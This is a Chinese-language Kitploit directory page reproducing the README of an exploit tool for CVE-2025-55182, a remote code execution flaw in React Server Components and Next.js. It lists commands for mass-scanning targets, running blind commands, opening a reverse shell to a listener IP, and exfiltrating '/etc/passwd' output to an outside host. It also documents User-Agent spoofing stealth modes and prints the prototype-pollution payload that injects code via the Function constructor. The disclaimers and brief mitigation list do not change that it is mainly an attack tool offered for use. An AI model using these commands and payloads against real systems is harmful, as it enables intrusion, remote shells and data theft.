Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-55182-exp — CVE-2025-55182 React Server Components 远程代码执行利用工具 | Kitploit
工具/GitHubGitHub/spritualkb/cve-2025-55182-exp
漏洞扫描器漏洞利用Web应用程序漏洞利用CTF渗透测试学习与教育红队远程访问工具Payload 开发
GitHubspritualkb/cve-2025-55182-exp

CVE-2025-55182-exp

CVE-2025-55182 React Server Components 远程代码执行利用工具

查看仓库
461239个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-55182-exp

CVE 类型 Python 许可证

🔥 概述

CVE-2025-55182 是一个影响使用 App Router 和 Server Actions 的 Next.js 应用中 React Server Components (RSC) 的严重远程代码执行 (RCE) 漏洞。

该漏洞存在于 Flight 协议反序列化过程中,使攻击者能够通过原型污染实现任意代码执行。

⚠️ 免责声明

仅限授权安全测试使用

本工具仅供教育和授权渗透测试使用。未经授权访问计算机系统是违法的。任何违规或非法使用本工具的行为,一切后果由使用者自行承担,作者不承担任何责任。

使用本工具前请阅读完整的 DISCLAIMER.md。

使用本工具即表示您同意:

  • 您已获得所有测试的适当授权
  • 您将遵守所有适用法律法规
  • 您对自己的行为承担全部责任
  • 作者对任何滥用行为不承担任何责任

📋 受影响版本

组件受影响版本
react-server-dom-webpack19.0.0 - 19.2.0
Next.js15.x, 16.x(App Router + Server Actions)

🛠️ 安装

root@kitploit:~
# 克隆仓库
git clone https://github.com/Spritualkb/CVE-2025-55182-exp.git
cd CVE-2025-55182-exp

# 安装依赖
pip install requests
pip install requests[socks]  # 支持 SOCKS5 代理

📖 使用方法

检查单个目标

root@kitploit:~
python3 exploit.py http://target:3000 --check

从文件批量扫描

root@kitploit:~
# 基础批量扫描
python3 exploit.py -f targets.txt --check

# 使用隐身模式和延迟
python3 exploit.py -f targets.txt --check --stealth crawler --delay 2

# 保存易受攻击的目标到文件
python3 exploit.py -f targets.txt --check -o vulnerable.txt

执行命令(盲 RCE)

root@kitploit:~
python3 exploit.py http://target:3000 -c "id"

反弹 Shell

root@kitploit:~
# 先启动监听器
nc -lvnp 4444

# 执行反弹 Shell
python3 exploit.py http://target:3000 --revshell 10.0.0.1 4444

窃取命令输出

root@kitploit:~
# 启动监听器
nc -lvnp 4444

# 执行并窃取输出
python3 exploit.py http://target:3000 --exfil "cat /etc/passwd" 10.0.0.1 4444

使用代理

root@kitploit:~
python3 exploit.py http://target:3000 --check --proxy socks5://127.0.0.1:1080

🎭 隐身模式

模式描述
browser模拟真实浏览器请求(默认)
crawler模拟搜索引擎爬虫(Googlebot、Baiduspider 等)
security使用安全扫描器 User-Agent

🔧 选项

选项描述
target目标 URL(例如 http://localhost:3000)
-f, --file包含目标 URL 的文件(每行一个)
-o, --output输出文件,保存易受攻击的目标
-c, --command要执行的命令(盲)
--check检查是否存在漏洞
--proxySOCKS5 代理(例如 socks5://127.0.0.1:1080)
--stealth隐身模式:browser、crawler、security
--delay请求之间的延迟(秒)
--variants使用多个载荷变体进行彻底检查
--revshell IP PORT反弹 Shell 到 IP:PORT
--exfil CMD IP PORT执行 CMD 并将输出 POST 到 IP:PORT
-t, --timeout请求超时(秒,默认:15)

🔬 技术细节

漏洞机制

该漏洞利用 Flight 协议反序列化中的原型污染:

  1. 原型污染:通过 "$1:__proto__:then" 污染 Object.prototype.then
  2. 函数构造函数访问:通过 "$1:constructor:constructor" 将 _formData.get 设置为 Function 构造函数
  3. 代码注入:通过 _prefix 注入恶意代码,该代码被传递给 Function()

载荷结构

root@kitploit:~
{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "<malicious_code>",
    "_chunks": "$Q2",
    "_formData": {"get": "$1:constructor:constructor"}
  }
}

📁 文件结构

root@kitploit:~
CVE-2025-55182-exp/
├── exploit.py      # 主漏洞利用脚本
├── targets.txt     # 目标 URL 列表(每行一个)
└── README.md       # 本文件

📝 targets.txt 格式

root@kitploit:~
# 注释以 # 开头
http://target1.com:3000
https://target2.com
target3.com:3000

🛡️ 缓解措施

  1. 更新到 react-server-dom-webpack 和 Next.js 的最新补丁版本
  2. 实施对 Server Actions 的输入验证
  3. 使用 Web 应用防火墙 (WAF) 规则检测恶意的 Flight 协议载荷
  4. 监控与原型相关的异常服务器端错误(HTTP 500)

📜 许可证

本项目采用 MIT 许可证 - 详情请参阅 LICENSE 文件。


⚠️ 法律免责声明

英文

使用条款

下载、复制、安装或使用本软件即表示您同意受本免责声明条款的约束。

预期用途

本工具仅用于:

  • 授权的渗透测试
  • 安全研究和教育
  • 经过适当授权的漏洞评估
  • CTF(夺旗赛)比赛
  • 个人实验室环境

禁止用途

您不得将本工具用于:

  • 未经授权访问计算机系统
  • 任何非法活动
  • 在没有明确书面许可的情况下攻击系统
  • 对任何系统或数据造成损害
  • 任何违反当地、州、国家或国际法律的活动

无担保声明

本软件按"原样"提供,不提供任何明示或暗示的担保。作者否认所有担保,包括但不限于:

  • 适销性
  • 特定用途的适用性
  • 非侵权性

责任限制

在任何情况下,作者均不对以下情况承担责任:

  • 直接、间接、附带、特殊、惩戒性或后果性损害
  • 数据、利润或商业机会的损失
  • 因滥用本工具而产生的法律后果

用户责任

用户对以下事项承担全部责任:

  • 在测试任何系统之前获得适当的授权
  • 遵守所有适用的法律法规
  • 使用本工具产生的任何后果
  • 确保其行为在其管辖范围内的合法性

确认声明

使用本工具即表示您确认:

  1. 您已阅读并理解本免责声明
  2. 您将仅将本工具用于合法和授权的目的
  3. 您接受与使用本工具相关的所有风险
  4. 作者对任何滥用行为不承担任何责任

中文

使用条款

下载、复制、安装或使用本软件即表示您同意受本免责声明条款的约束。

预期用途

本工具仅用于:

  • 授权的渗透测试
  • 安全研究和教育
  • 经过适当授权的漏洞评估
  • CTF(夺旗赛)比赛
  • 个人实验室环境

禁止用途

您不得将本工具用于:

  • 未经授权访问计算机系统
  • 任何非法活动
  • 在没有明确书面许可的情况下攻击系统
  • 对任何系统或数据造成损害
  • 任何违反当地、州、国家或国际法律的活动

无担保声明

本软件按"原样"提供,不提供任何明示或暗示的担保。作者否认所有担保,包括但不限于:

  • 适销性
  • 特定用途的适用性
  • 非侵权性

责任限制

在任何情况下,作者均不对以下情况承担责任:

  • 直接、间接、附带、特殊、惩戒性或后果性损害
  • 数据、利润或商业机会的损失
  • 因滥用本工具而产生的法律后果

用户责任

用户对以下事项承担全部责任:

  • 在测试任何系统之前获得适当的授权
  • 遵守所有适用的法律法规
  • 使用本工具产生的任何后果
  • 确保其行为在其管辖范围内的合法性

确认声明

使用本工具即表示您确认:

  1. 您已阅读并理解本免责声明
  2. 您将仅将本工具用于合法和授权的目的
  3. 您接受与使用本工具相关的所有风险
  4. 作者对任何滥用行为不承担任何责任

法律参考

相关法律

  • 中国: 《中华人民共和国网络安全法》、《中华人民共和国刑法》第285条、第286条
  • USA: Computer Fraud and Abuse Act (CFAA), 18 U.S.C. § 1030
  • EU: Directive 2013/40/EU on attacks against information systems
  • UK: Computer Misuse Act 1990

授权测试要求

在进行任何安全测试之前,您必须:

  1. 获得系统所有者的书面授权
  2. 明确定义测试范围和边界
  3. 遵守所有适用的法律法规
  4. 记录所有测试活动

Before conducting any security testing, you must:

  1. Obtain written authorization from the system owner
  2. Clearly define the scope and boundaries of testing
  3. Comply with all applicable laws and regulations
  4. Document all testing activities

⚠️ 未经授权的计算机访问是违法行为 ⚠️
⚠️ Unauthorized computer access is a criminal offense ⚠️

下载工具